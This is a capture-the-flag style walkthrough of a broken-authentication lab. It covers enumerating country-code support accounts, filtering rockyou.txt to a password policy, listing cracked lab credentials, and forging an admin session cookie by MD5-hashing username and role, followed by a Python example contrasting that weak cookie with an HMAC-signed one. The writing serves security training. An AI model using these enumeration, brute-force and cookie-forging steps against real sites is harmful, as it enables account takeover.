Broken Authentication
Skills Assessment - Hardest module for CBBH path
Register an account with the following credentials:
123francis123:P@ssw0rd1P@ssw0rd123
If you try common passwords, registration is blocked by the password policy.
Password policy:
The password must start with a capital letter
The password must end with a digit
The password must contain at least one special char: $ # @
The password is shorter than 20 characters
From the support page, we know there is a global account called support.
It also mentions that the other accounts remain unchanged and that any department can still be contacted by adding the country code.
Let's enumerate the per-country support accounts with a wordlist of country codes.
/messages.php can be used to brute-force usernames via Intruder, since the login endpoint is rate limited.
Country code wordlist
/home/francis/HTB/SecLists/Fuzzing/country-codes.txt
It will take some time to fuzz the different support accounts based on country code.
Let's filter rockyou.txt according to the password policy:
grep '[[:upper:]]' rockyou.txt | grep '[[:punct:]]' | grep '[[:lower:]]' | grep -E '^.{20,20}$' | grep '[[:digit:]]$'
The resulting custom password list can be used to brute-force the different support accounts.
After manually brute-forcing via the login page, the valid credentials are:
support.cn:BisocaBuzau#20061985
support.it:Mustang#firebird1995
support.gr:Situngkir766H!011104
support.uk:TrillPrincessMentality#1
support.us:Mustang#firebird1995
From support.gr, grab the session cookie and run ./dcode <session cookie> (Decodify):
./dcode NjhjOTI2MDA5MDYyMGU1ZjQ3MWVhYWVlY2IwYmNlNTk6NDM0OTkwYzhhMjVkMmJlOTQ4NjM1NjFhZTk4YmQ2ODI%3D
Decoded from Base64 : 68c9260090620e5f471eaaeecb0bce59:434990c8a25d2be94863561ae98bd682
The output above is in the format <md5 hash>:<md5 hash>.
Let's look up the two MD5 hashes one by one.
They resolve to support.gr:support, so the cookie is md5(username):md5(role), with nothing binding it to a server-side secret.
Now let's change username:role to admin privileges:
admin.gr:admin, with each part hashed with MD5
echo -n 'admin.gr' | md5sum
041da04f12f5c3768bd0f9cb1efd5572
echo -n 'admin' | md5sum
21232f297a57a5a743894a0e4a801fc3
So the new format is 041da04f12f5c3768bd0f9cb1efd5572:21232f297a57a5a743894a0e4a801fc3
Now use CyberChef to Base64-encode it and then URL-encode it:
MDQxZGEwNGYxMmY1YzM3NjhiZDBmOWNiMWVmZDU1NzI6MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Set the cookie via the browser developer tools to get the flag.
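The cookie weakness above comes down to the server trusting a value the client can compute. The added example below (not the lab's code) parses the captured support.gr cookie, rebuilds the unsigned md5(user):md5(role) format exactly as observed, and then shows the hardened form a defender would ship instead: the same fields plus an HMAC-SHA256 tag under a server-only key, checked with a constant-time compare. The key is a constructed placeholder.

```python
import base64
import hashlib
import hmac
import urllib.parse
from typing import Optional, Tuple

# Session cookie captured from support.gr on the page: URL-encoded Base64 of md5(user):md5(role).
OBSERVED_COOKIE = ("NjhjOTI2MDA5MDYyMGU1ZjQ3MWVhYWVlY2IwYmNlNTk6"
                   "NDM0OTkwYzhhMjVkMmJlOTQ4NjM1NjFhZTk4YmQ2ODI%3D")


def parse_weak_cookie(cookie: str) -> Tuple[str, str]:
    """Undo the URL encoding and Base64, then split into (md5(user), md5(role))."""
    raw = base64.b64decode(urllib.parse.unquote(cookie)).decode()
    user_hash, role_hash = raw.split(":", 1)
    return user_hash, role_hash


def build_weak_cookie(username: str, role: str) -> str:
    """The application's own format: derived purely from public inputs, so any client
    that knows the layout can mint a cookie for any user and role (the flaw on this page)."""
    payload = f"{hashlib.md5(username.encode()).hexdigest()}:{hashlib.md5(role.encode()).hexdigest()}"
    return urllib.parse.quote(base64.b64encode(payload.encode()).decode())


def issue_signed_cookie(username: str, role: str, key: bytes) -> str:
    """Hardened form: same fields, plus an HMAC-SHA256 tag computed with a server-only key."""
    payload = f"{username}:{role}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return urllib.parse.quote(base64.b64encode(payload + b":" + tag.encode()).decode())


def verify_signed_cookie(cookie: str, key: bytes) -> Optional[Tuple[str, str]]:
    """Return (username, role) only when the tag verifies; None for forged, tampered,
    or old-format (two-field) cookies. Uses a constant-time compare for the tag."""
    try:
        raw = base64.b64decode(urllib.parse.unquote(cookie)).decode()
        username, role, tag = raw.rsplit(":", 2)  # role and tag never contain ':'
    except ValueError:  # wrong Base64, bad UTF-8, or not three fields
        return None
    expected = hmac.new(key, f"{username}:{role}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return username, role


if __name__ == "__main__":
    print(parse_weak_cookie(OBSERVED_COOKIE))
    key = b"constructed-server-secret"  # placeholder; a real deployment loads this from secure config
    print(verify_signed_cookie(issue_signed_cookie("support.gr", "support", key), key))
```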